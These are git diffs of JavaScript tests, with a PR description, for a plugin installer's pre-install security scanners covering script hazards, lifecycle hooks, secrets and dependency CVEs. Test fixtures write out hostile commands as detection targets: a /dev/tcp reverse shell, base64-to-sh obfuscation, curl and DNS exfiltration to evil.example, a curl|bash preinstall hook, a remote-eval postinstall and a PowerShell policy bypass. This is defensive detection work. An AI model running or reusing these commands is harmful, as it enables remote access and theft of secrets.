+      if (String(url).includes("/security/advisories/bulk")) {
+        const req = JSON.parse(String(opts?.body ?? "{}"));
+        const payload = req["vuln-dep"] ? {
+          "vuln-dep": [{
+            severity: "critical", title: "Prototype Pollution in vuln-dep",
+            vulnerable_versions: "<=1.0.0", url: "https://github.com/advisories/GHSA-e2e-test"
+          }]
+        } : {};
+        return {
+          ok: true, status: 200,
+          json: async () => payload,
+          text: async () => JSON.stringify(payload),
+          arrayBuffer: async () => Buffer.from(JSON.stringify(payload)),
+        };
+      }
+      return origE2eFetch(url, opts);
+    };
+    try {
+      r = await postInstall("e2e-owner/demo-plugin-vuln-deps", {});
+      check("e2e vulns 弹窗 awaiting-input", r.body && r.body.status, "awaiting-input");
+      check("e2e vulns 弹窗问题 id", r.body && r.body.questions && r.body.questions[0] && r.body.questions[0].id, "__confirm_vulns__");
+      const vulnQ = r.body && r.body.questions && r.body.questions[0] || {};
+      check("e2e vulns 弹窗含包名与 severity", (vulnQ.question || "").includes("[critical] vuln-dep"), true);
+      check("e2e vulns 弹窗含 advisory 链接", (vulnQ.question || "").includes("GHSA-e2e-test"), true);
+      r = await postInstall("e2e-owner/demo-plugin-vuln-deps", { __confirm_vulns__: "continue" });
+      check("e2e vulns 放行后安装完成", r.body && ["done", "installed"].includes(r.body.status), true);
+      // 取消路径
+      setupUrlRewrite(owner, "demo-plugin-vuln-deps2");
+      makeFixtureRepo("demo-plugin-vuln-deps2", {
+        "package.json": JSON.stringify({
+          name: "demo-plugin-vuln-deps2", version: "1.0.0", dsh: { version: "1.0.0" }, main: "index.js",
+          dependencies: { "vuln-dep2": "file:packages/vuln-dep2" },
+        }),
+        "packages/vuln-dep2/package.json": JSON.stringify({ name: "vuln-dep2", version: "1.0.0" }),
+        "index.js": "module.exports = {}\n",
+      });
+      r = await postInstall("e2e-owner/demo-plugin-vuln-deps2", { __confirm_vulns__: "cancel" });
+      check("e2e vulns 取消 aborted", r.body && r.body.status, "aborted");
+      check("e2e vulns 取消后缓存已清理", existsSync(join(HOME, "marketplace", "cache", "e2e-owner__demo-plugin-vuln-deps2")), false);
+    } finally {
+      globalThis.fetch = origE2eFetch;
+    }
+
     // ---- 源码型插件构建路径：__confirm_build__=allow → buildPluginPackage ----
     // npm 分支（无 pnpm-lock.yaml）：真实 runNpm install（离线）+ run build 产出入口。
     setupUrlRewrite(owner, "demo-build");

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -1342,7 +1342,9 @@ function mockFetchCapture(payload, status = 200) {
   check("detectTypeDetail 无特征 → instructions + none 理由",
     [dtNone.type, dtNone.reasonKey, dtNone.hintKey],
     ["instructions", "detectReason.none", "detectHint.none"]);
-  // 8. 脚本静态危险模式扫描（discussion #2269 承诺项，四类模式）
+  // 8. 脚本静态危险模式扫描（discussion #2269 承诺项；2026-08 规则集扩充：
+  //    按语言分表 bash/ps1 + 共享凭据字典，语义参考 ShellCheck/PSScriptAnalyzer/
+  //    Semgrep command-injection/GuardDog 启发式）
   const hazDir = join(process.env.DSH_HOME, "hazard-fixtures");
   const mkHaz = (name, content) => {
     const f = join(hazDir, name);
@@ -1367,6 +1369,23 @@ function mockFetchCapture(payload, status = 200) {
   ].join("\n")));
   check("scanScriptHazards ps1 三类命中", ps1Hits.map((h) => h.category),
     ["downloadExec", "pathStartup", "credRead"]);
+  // 新规则覆盖：混淆/外泄/持久化（每类抽代表）
+  const shObf = await lib.scanScriptHazards(mkHaz("obf.sh", [
+    "echo " + "Q2xpY2tIZXJlVG9Eb3dubG9hZE1hbHdhcmVQYXlsb2Fk" + " | base64 -d | sh"
+  ].join("\n")));
+  check("sh base64 管道混淆命中 obfuscation", shObf.map((h) => h.category), ["obfuscation"]);
+  const shExfil = await lib.scanScriptHazards(mkHaz("exfil.sh", [
+    "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
+  ].join("\n")));
+  check("sh 反向 shell 命中 exfil", shExfil.map((h) => h.category), ["exfil"]);
+  const ps1Persist = await lib.scanScriptHazards(mkHaz("persist.ps1", [
+    "__EventFilter Name=EvilFilter"
+  ].join("\n")));
+  check("ps1 WMI 事件订阅命中 pathStartup", ps1Persist.map((h) => h.category), ["pathStartup"]);
+  const ps1Dyn = await lib.scanScriptHazards(mkHaz("dyn.ps1", [
+    "Set-ExecutionPolicy Bypass -Scope Process"
+  ].join("\n")));
+  check("ps1 执行策略绕过命中 dynamicExec", ps1Dyn.map((h) => h.category), ["dynamicExec"]);
   check("scanScriptHazards 干净脚本无命中",
     (await lib.scanScriptHazards(mkHaz("clean.ps1", "Write-Host 'hi'\nNew-Item -Path ./out\n"))).length, 0);
   check("scanScriptHazards 文件缺失返回空", (await lib.scanScriptHazards(join(hazDir, "nope.sh"))).length, 0);

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -1451,6 +1451,34 @@ function mockFetchCapture(payload, status = 200) {
   mkdirSync(join(lcDir, "scripts"), { recursive: true });
   writeFileSync(join(lcDir, "scripts", "build.js"), "console.log('build ok');\n", "utf8");
   check("lifecycle 干净脚本无命中", (await lib.scanLifecycleHazards(lcDir)).length, 0);
+
+  // 安装前 secrets 扫描（scanCacheSecrets：目录遍历 + 扩展名过滤 + 上限）
+  const secDir = join(process.env.DSH_HOME, "secrets-fixtures");
+  // token fixture 拼接构造：避免源码出现完整密钥字面量（平台 secret scanning push protection）
+  const secP = (...p) => ["sk-", ...p].join("");
+  mkdirSync(join(secDir, "lib"), { recursive: true });
+  mkdirSync(join(secDir, "node_modules", "dep"), { recursive: true });
+  writeFileSync(join(secDir, "config.js"), `module.exports = { apiKey: "${secP("AbCd1234EfGh5678IjKl90Mn")}" };\n`, "utf8");
+  writeFileSync(join(secDir, "lib", "settings.json"), JSON.stringify({ password: "Tr0ub4dor&3XYZ" }), "utf8");
+  // node_modules 内的命中必须被跳过（依赖目录不算插件源码泄露）
+  writeFileSync(join(secDir, "node_modules", "dep", "index.js"), `const k = "${secP("ZxYw9876VuTs5432RqPo12Mn")}";\n`, "utf8");
+  const secHits = await lib.scanCacheSecrets(secDir);
+  check("secrets 已知密钥结构命中", secHits.some((h) => h.kind === "secret-key" && h.file === "config.js" && h.line === 1), true);
+  check("secrets 关键词邻近命中", secHits.some((h) => h.kind === "context" && h.file === "lib/settings.json"), true);
+  check("secrets 跳过 node_modules", secHits.every((h) => !h.file.includes("node_modules")), true);
+  check("secrets 相对路径正斜杠", secHits.every((h) => !h.file.includes("\\")), true);
+  // .env 文件（无扩展名形态）也要扫到
+  writeFileSync(join(secDir, ".env.local"), "API_KEY=ghp_abcdefghijklmnopqrstuvwxyz0123456789\n", "utf8");
+  const secHits2 = await lib.scanCacheSecrets(secDir);
+  check("secrets .env 基名文件命中", secHits2.some((h) => h.file === ".env.local" && h.kind === "github"), true);
+  // 干净仓库无命中
+  const secClean = join(secDir, "clean");
+  mkdirSync(secClean, { recursive: true });
+  writeFileSync(join(secClean, "index.js"), "console.log('hello world');\n", "utf8");
+  check("secrets 干净仓库无命中", (await lib.scanCacheSecrets(secClean)).length, 0);
+  // 不存在的目录返回空
+  check("secrets 目录缺失返回空", (await lib.scanCacheSecrets(join(secDir, "nope"))).length, 0);
+
   // 9. CLI 指令 npm 等价回退纯函数（issue #54 archify 教训）
   check("isNpmCliTarget scope 包带版本", lib.isNpmCliTarget("@tt-a1i/archify-dsh@0.1.0"), true);
   check("isNpmCliTarget 裸包名", lib.isNpmCliTarget("dsh-web-ui-all"), true);

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -1479,6 +1479,98 @@ function mockFetchCapture(payload, status = 200) {
   // 不存在的目录返回空
   check("secrets 目录缺失返回空", (await lib.scanCacheSecrets(join(secDir, "nope"))).length, 0);
 
+  // 安装前依赖 CVE 扫描（readVulnScanDeps 纯函数 + scanCacheVulnerabilities mock API）
+  const vulnPkg = {
+    name: "vuln-fixture", version: "1.0.0",
+    dependencies: { lodash: "^4.17.15", express: "4.18.2" },
+    optionalDependencies: { fsevents: "^2.3.2" },
+    devDependencies: { "dev-only-pkg": "^1.0.0" },
+  };
+  const vulnDeps = lib.readVulnScanDeps(vulnPkg, new Map([["lodash", "4.17.15"]]));
+  check("cve deps 含 dependencies+optional", vulnDeps.map((d) => d.name).sort(), ["express", "fsevents", "lodash"]);
+  check("cve lockfile 精确版本优先", vulnDeps.find((d) => d.name === "lodash").version, "4.17.15");
+  check("cve 无锁文件剥 ^ 取下界", vulnDeps.find((d) => d.name === "fsevents").version, "2.3.2");
+  check("cve devDependencies 不进扫描面", vulnDeps.some((d) => d.name === "dev-only-pkg"), false);
+  const cveDir = join(process.env.DSH_HOME, "cve-fixtures");
+  mkdirSync(cveDir, { recursive: true });
+  writeFileSync(join(cveDir, "package.json"), JSON.stringify(vulnPkg), "utf8");
+  // mock：lodash@4.17.15 命中 critical/high，express/fsevents 干净
+  const origVulnFetch = globalThis.fetch;
+  globalThis.fetch = async (url, opts) => {
+    if (!String(url).includes("/security/advisories/bulk")) return { ok: false, status: 404 };
+    const req = JSON.parse(String(opts.body));
+    const payload = {};
+    if (req.lodash?.[0] === "4.17.15") {
+      payload.lodash = [{
+        severity: "critical", title: "Prototype Pollution in lodash",
+        vulnerable_versions: ">=4.0.0 <4.17.21", url: "https://github.com/advisories/GHSA-test"
+      }];
+    }
+    return {
+      ok: true, status: 200,
+      json: async () => payload,
+      text: async () => JSON.stringify(payload),
+      arrayBuffer: async () => Buffer.from(JSON.stringify(payload)),
+    };
+  };
+  try {
+    const vulnHits = await lib.scanCacheVulnerabilities(cveDir);
+    check("cve bulk API critical/high 命中", vulnHits.length, 1);
+    check("cve 命中字段完整", [vulnHits[0].name, vulnHits[0].severity, vulnHits[0].title.includes("Prototype Pollution")],
+      ["lodash", "critical", true]);
+    // moderate/low 不弹（只收 critical/high）
+    globalThis.fetch = async (url, opts) => {
+      if (!String(url).includes("/security/advisories/bulk")) return { ok: false, status: 404 };
+      const req = JSON.parse(String(opts.body));
+      const payload = req.lodash ? { lodash: [{ severity: "moderate", title: "ReDoS", vulnerable_versions: "<4.17.21", url: "" }] } : {};
+      return {
+        ok: true, status: 200,
+        json: async () => payload,
+        text: async () => JSON.stringify(payload),
+        arrayBuffer: async () => Buffer.from(JSON.stringify(payload)),
+      };
+    };
+    const vulnModerate = await lib.scanCacheVulnerabilities(cveDir);
+    check("cve moderate/low 不命中弹窗面", vulnModerate.length, 0);
+    // 网络失败静默降级（不阻断安装）
+    globalThis.fetch = async () => { throw new Error("network down"); };
+    check("cve 网络失败静默降级", (await lib.scanCacheVulnerabilities(cveDir)).length, 0);
+    // API 非 200 同样降级
+    globalThis.fetch = async () => ({ ok: false, status: 503 });
+    check("cve API 非 200 静默降级", (await lib.scanCacheVulnerabilities(cveDir)).length, 0);
+  } finally {
+    globalThis.fetch = origVulnFetch;
+  }
+  // package.json 缺失返回空
+  check("cve package.json 缺失返回空", (await lib.scanCacheVulnerabilities(join(secDir, "clean"))).length, 0);
+  // file: 协议依赖从目标分包 package.json 取版本
+  const cveFileDir = join(process.env.DSH_HOME, "cve-file-fixture");
+  mkdirSync(join(cveFileDir, "packages", "local-a"), { recursive: true });
+  writeFileSync(join(cveFileDir, "package.json"), JSON.stringify({
+    name: "vuln-file", version: "1.0.0",
+    dependencies: { "local-a": "file:packages/local-a" },
+  }), "utf8");
+  writeFileSync(join(cveFileDir, "packages", "local-a", "package.json"),
+    JSON.stringify({ name: "local-a", version: "2.0.3" }), "utf8");
+  globalThis.fetch = async (url, opts) => {
+    if (!String(url).includes("/security/advisories/bulk")) return { ok: false, status: 404 };
+    const req = JSON.parse(String(opts.body));
+    const payload = req["local-a"]?.[0] === "2.0.3" ? { "local-a": [{ severity: "high", title: "XSS", vulnerable_versions: "<2.1.0", url: "" }] } : {};
+    return {
+      ok: true, status: 200,
+      json: async () => payload,
+      text: async () => JSON.stringify(payload),
+      arrayBuffer: async () => Buffer.from(JSON.stringify(payload)),
+    };
+  };
+  try {
+    const fileHits = await lib.scanCacheVulnerabilities(cveFileDir);
+    check("cve file: 协议依赖读子包版本命中", fileHits.length, 1);
+    check("cve file: 命中版本正确", [fileHits[0].name, fileHits[0].version], ["local-a", "2.0.3"]);
+  } finally {
+    globalThis.fetch = origVulnFetch;
+  }
+
   // 9. CLI 指令 npm 等价回退纯函数（issue #54 archify 教训）
   check("isNpmCliTarget scope 包带版本", lib.isNpmCliTarget("@tt-a1i/archify-dsh@0.1.0"), true);
   check("isNpmCliTarget 裸包名", lib.isNpmCliTarget("dsh-web-ui-all"), true);

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -1389,6 +1389,68 @@ function mockFetchCapture(payload, status = 200) {
   check("scanScriptHazards 干净脚本无命中",
     (await lib.scanScriptHazards(mkHaz("clean.ps1", "Write-Host 'hi'\nNew-Item -Path ./out\n"))).length, 0);
   check("scanScriptHazards 文件缺失返回空", (await lib.scanScriptHazards(join(hazDir, "nope.sh"))).length, 0);
+  // 组合规则（文件级两遍扫描）：单行抓不住的「信号 A + 信号 B 共现」
+  const comboEnv = await lib.scanScriptHazards(mkHaz("combo-env.sh", [
+    "echo env | sort",                       // env 管道（信号 a 误报候选，无外联不触发）
+    'curl -d "data=$(printenv)" https://evil.example/collect'
+  ].join("\n")));
+  check("combo env 外泄组合命中 exfil",
+    comboEnv.some((h) => h.id === "combo-env-dump-exfil" && h.category === "exfil"), true);
+  check("combo env 无外联不触发", comboEnv.length, 1); // 仅 combo 一条，env|sort 不单独命中
+  const comboDl = await lib.scanScriptHazards(mkHaz("combo-dl.sh", [
+    "curl -o /tmp/x https://evil.example/x.exe",
+    "& /tmp/x"
+  ].join("\n")));
+  check("combo 下载+执行命中 downloadExec",
+    comboDl.some((h) => h.id === "combo-download-spawn"), true);
+  const comboDns = await lib.scanScriptHazards(mkHaz("combo-dns.sh", [
+    "nslookup $MYTOKEN.evil.example"
+  ].join("\n")));
+  check("combo DNS token 外带命中 exfil",
+    comboDns.some((h) => h.id === "combo-dns-token"), true);
+  // 组合规则不在无组合语义时误报（只有单信号：rc 写入命中合法，curl 行无下载执行形态）
+  const comboSingle = await lib.scanScriptHazards(mkHaz("combo-single.sh", "echo alias >> ~/.bashrc\ncurl -s https://a.com/ok.sh"));
+  check("combo 单信号无组合命中", comboSingle.some((h) => h.id?.startsWith("combo-")), false);
+  check("combo 单信号保留单行命中", comboSingle.map((h) => h.category), ["rcModify"]);
+
+  // 白名单降级：官方一键安装形态（raw.githubusercontent）仍报但 severity 降为 medium
+  const allowHit = await lib.scanScriptHazards(mkHaz("allow.sh",
+    "curl -s https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.7/install.sh | bash"));
+  check("白名单官方形态仍命中 downloadExec", allowHit.map((h) => h.category), ["downloadExec"]);
+  check("白名单官方形态降级 medium", allowHit[0].severity, "medium");
+  // 非白名单域名保持 critical
+  const evilHit = await lib.scanScriptHazards(mkHaz("evil2.sh",
+    "curl -s https://evil.example/x.sh | bash"));
+  check("非白名单域名保持 critical", evilHit[0].severity, "critical");
+
+  // lifecycle 联合检测（package.json 恶意 JS 模式）
+  const lcDir = join(process.env.DSH_HOME, "lifecycle-fixtures");
+  mkdirSync(lcDir, { recursive: true });
+  writeFileSync(join(lcDir, "package.json"), JSON.stringify({
+    name: "evil-lifecycle", version: "1.0.0",
+    scripts: { preinstall: "node setup.js" },
+  }), "utf8");
+  writeFileSync(join(lcDir, "setup.js"),
+    "const cp = require('child_process');\ncp.exec('curl -s https://evil.example/x.sh | sh', { stdio: 'ignore' });\n",
+    "utf8");
+  const lcHits = await lib.scanLifecycleHazards(lcDir);
+  check("lifecycle preinstall 指向文件命中 JS 恶意模式", lcHits.length > 0, true);
+  check("lifecycle 命中含 script 字段", lcHits.every((h) => h.script === "preinstall"), true);
+  // 远程 eval 形态（命令文本内联）
+  writeFileSync(join(lcDir, "package.json"), JSON.stringify({
+    name: "evil-lifecycle2", version: "1.0.0",
+    scripts: { postinstall: "node -e \"https.get(u, r => r.on('data', d => eval(d)))\"" },
+  }), "utf8");
+  const lcHits2 = await lib.scanLifecycleHazards(lcDir);
+  check("lifecycle 命令文本内联远程 eval 命中", lcHits2.some((h) => h.id === "remote-eval"), true);
+  // 干净 lifecycle 无命中
+  writeFileSync(join(lcDir, "package.json"), JSON.stringify({
+    name: "clean-lifecycle", version: "1.0.0",
+    scripts: { postinstall: "node scripts/build.js" },
+  }), "utf8");
+  mkdirSync(join(lcDir, "scripts"), { recursive: true });
+  writeFileSync(join(lcDir, "scripts", "build.js"), "console.log('build ok');\n", "utf8");
+  check("lifecycle 干净脚本无命中", (await lib.scanLifecycleHazards(lcDir)).length, 0);
   // 9. CLI 指令 npm 等价回退纯函数（issue #54 archify 教训）
   check("isNpmCliTarget scope 包带版本", lib.isNpmCliTarget("@tt-a1i/archify-dsh@0.1.0"), true);
   check("isNpmCliTarget 裸包名", lib.isNpmCliTarget("dsh-web-ui-all"), true);

--- a/scripts/tests/unit/redact.test.mjs
+++ b/scripts/tests/unit/redact.test.mjs
@@ -100,6 +100,11 @@ keep("纯小写标识符", "secret: error-module-not-found", "error-module-not-f
 keep("短值(<8)", "pwd: abc", "pwd: abc");
 keep("正常日志", "pnpm install completed with 0 errors", "pnpm install completed");
 
+// ---- 泄漏面：弱凭据（DeepSec L1 ai_pattern_default_password 同族，值级检测）----
+noLeak("弱凭据 12345678", "PWD=12345678", "12345678");
+noLeak("弱凭据 admin123", "password: admin123", "admin123");
+keep("文档示例 changeme 不掩", "password: changeme", "changeme");
+
 // ---- 注入面 ----
 keep("CR/LF 净化", "line1\r\nline2\rline3", "line1\nline2\nline3");
 check("markdown 围栏净化", neutralizeMarkdownFences("```sh\ncode\n```"), "'''sh\ncode\n'''");

--- a/scripts/tests/unit/redact.test.mjs
+++ b/scripts/tests/unit/redact.test.mjs
@@ -4,7 +4,7 @@
 //   误报面——标识符/停用词/包名不得掩码（掩码过度 = 维护者无法诊断）
 //   注入面——CR/LF 与 markdown 围栏必须净化（附 issue 特有攻击面）
 
-import { redactLog, shannonEntropy, neutralizeMarkdownFences } from "../../../lib/redact.js";
+import { redactLog, shannonEntropy, neutralizeMarkdownFences, findSecrets } from "../../../lib/redact.js";
 
 let pass = 0, fail = 0;
 function check(name, actual, expected) {
@@ -137,6 +137,24 @@ keep("纯英文长词不掩", "error message authenticationfailedtoken", "authen
   check("真实场景无密钥", out.includes("sk-live-abc123def456ghi789jkl"), false);
   check("真实场景保留错误上下文", out.includes("pnpm failed in profile directory"), true);
   check("真实场景保留 clone 错误", out.includes("Command failed: git clone"), true);
+}
+
+// ---- findSecrets：安装前 secrets 扫描（复用规则面，返回结构化命中）----
+{
+  const src = [
+    "// config",
+    "const key = \"sk-abc123def456ghi789jkl012mno345pqr678\";",
+    "const url = \"https://github.com/owner/repo\";",
+    "password: Tr0ub4dor&3XYZ",
+  ].join("\n");
+  const hits = findSecrets(src);
+  check("findSecrets 已知密钥命中", hits.some((h) => h.kind === "secret-key" && h.line === 2), true);
+  check("findSecrets 上下文邻近命中", hits.some((h) => h.kind === "context" && h.line === 4), true);
+  check("findSecrets 不误报 URL", hits.every((h) => !h.text.includes("github.com/owner/repo")), true);
+  check("findSecrets 命中行含原文", hits[0].text.includes("sk-abc123"), true);
+  check("findSecrets maxHits 截断", findSecrets("token: aBcDeFgH0123\n".repeat(20), { maxHits: 3 }).length, 3);
+  check("findSecrets 空输入", findSecrets("").length, 0);
+  check("findSecrets 纯文档不误报", findSecrets("# README\ninstall via dsh plugin add owner/repo\n").length, 0);
 }
 
 console.log(`\n${pass} passed, ${fail} failed`);


### PR DESCRIPTION
## Summary

安装前静态安全审计增强——DeepSec 实测评估（结论：不适合，13/13 变量名误报 + 安装脚本零覆盖）后的自研规则集扩充。

### 1. 弱凭据值级检测（redact.js）

- `WEAK_CREDENTIALS` 值级集合（admin/root/12345678/admin123 等 16 词）——上下文邻近捕获的值命中即掩码
- 修复真实泄漏面：`password: admin123` 等默认弱凭据此前因「纯小写无数字」被 allowlist 放行
- 误报控制：`changeme` 等文档示例词仍放行；6 位以下短值维持长度门槛

### 2. 安装脚本审计规则集扩充（scanScriptHazards）

Grok 二轮调研（ShellCheck/PSScriptAnalyzer/Semgrep command-injection/GuardDog 启发式，62 条模式精选）落地：

- **第一批**：按语言分表（bash 22 / ps1 25 条）+ 共享凭据字典（8 条）+ 新增 4 类（dynamicExec/obfuscation/exfil/fileOps）；实测 BrowserSkill install.ps1 命中 3 处（DeepSec 零发现）
- **第二批**：
  - **组合规则引擎**（文件级两遍扫描）——单行抓不住的「信号 A + 信号 B 共现」：base64 长串+解码执行 / env 序列化+外联 / whoami·pwd 指纹外带 / DNS token 外带 / 下载+spawn 执行；sameLine 标志区分单行/跨行形态
  - **lifecycle 联合检测**（scanLifecycleHazards）——package.json 的 preinstall/postinstall 等命令文本 + 指向 JS 文件扫 6 类恶意模式（远程 eval / eval+base64 / child_process 静默 / 括号访问混淆 / env 序列化 / 拼接混淆 URL）；弹窗亮 hazards 详情（qNpmScriptsHazards）
  - **白名单降级**——官方一键安装域名（raw.githubusercontent 等 9 域）命中 downloadExec 时 severity 降为 medium（弱提示不消失——恶意脚本同样可托管在 raw.githubusercontent，完全放行是安全漏洞）

### 3. 安装前 secrets 扫描（findSecrets + scanCacheSecrets）

redact.js 规则面复用的第二用途（Q2 第③面）：

- **findSecrets**（`lib/redact.js` 结构化导出）——已知密钥结构 + 关键词邻近两个低误报面，返回 `{line, kind, text}`；不含路径/Bearer/熵兜底（源码场景 URL 路径段与随机串误报率高）
- **scanCacheSecrets**（`lib/index.js`）——遍历克隆缓存：文本型扩展名 allowlist + `.env*` 基名 + node_modules/.git/dist/build/vendor 跳过 + 200 文件/512KB 上限
- **`__confirm_secrets__` 全类型弹窗**——命中亮文件/行号/类别，**值经 redactLog 掩码展示**（弹窗文本永不携带密钥原文）；continue（示例/占位符）或 cancel（清缓存中止）

### 4. 安装前依赖 CVE 扫描（scanCacheVulnerabilities）

npm bulk advisories API（npm audit 同源，免 token）批量查询直接依赖已知漏洞：

- **扫描面** = dependencies + optionalDependencies（与 `--omit=dev` 实际安装面一致）；版本解析：lockfile 精确版本优先 → file: 子包读目标 package.json → 无锁剥 `^~` 取下界近似
- **只收 critical/high** 弹 `__confirm_vulns__`（包名/severity/标题/advisory 链接）；moderate/low 不打扰
- **静默降级**：网络失败与 API 非 200 返回空不阻断——离线/被墙环境安装不受影响
- OSV querybatch 评估后弃用（默认只回漏洞 ID 列表，详情需逐个二次请求，交叉价值低）

### 5. 后续

- L2 模型层路线重定（DeepSec 否决后：静态做深为主，LLM 语义审查列为远期评估）
- L3 沙箱维持远期（WSB+bwrap 按设计不动）

## Test plan

- [x] redact 92 断言（含弱凭据三面 + findSecrets 结构化扫描）
- [x] lib 集成 296 断言（组合规则 4 组 + 白名单降级 + lifecycle 联合检测 + scanCacheSecrets 目录遍历 + readVulnScanDeps 扫描面/版本解析 + bulk API mock 命中/降级/file: 协议）
- [x] e2e 180 断言（恶意 lifecycle 弹窗链路 + secrets 弹窗链路（值已脱敏验证）+ vulns 弹窗链路（mock bulk URL）各 continue/cancel 双分支）
- [x] i18n 中英完整（i18n-completeness 门捕获过 secretsCancelled 缺失后补齐）
- [x] 测试金字塔 34/34
- [x] 覆盖率 321/321
- [x] 突变存活 0
- [x] 真实世界脚本对照（BrowserSkill install.ps1 命中验证）
